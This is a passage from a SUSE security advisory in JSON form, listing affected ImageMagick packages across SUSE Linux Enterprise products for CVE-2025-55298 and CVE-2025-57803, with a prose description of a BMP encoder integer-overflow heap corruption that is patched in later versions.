"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-10T18:04:37Z",
"details": "important"
}
],
"title": "CVE-2025-55298"
},
{
"cve": "CVE-2025-57803",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-57803"
}
],
"notes": [
{
"category": "general",
"text": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-28 and 7.1.2-2 for ImageMagick\u0027s 32-bit build, a 32-bit integer overflow in the BMP encoder\u0027s scanline-stride computation collapses bytes_per_line (stride) to a tiny value while the per-row writer still emits 3 x width bytes for 24-bpp images. The row base pointer advances using the (overflowed) stride, so the first row immediately writes past its slot and into adjacent heap memory with attacker-controlled bytes. This is a classic, powerful primitive for heap corruption in common auto-convert pipelines. This issue has been patched in versions 6.9.13-28 and 7.1.2-2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
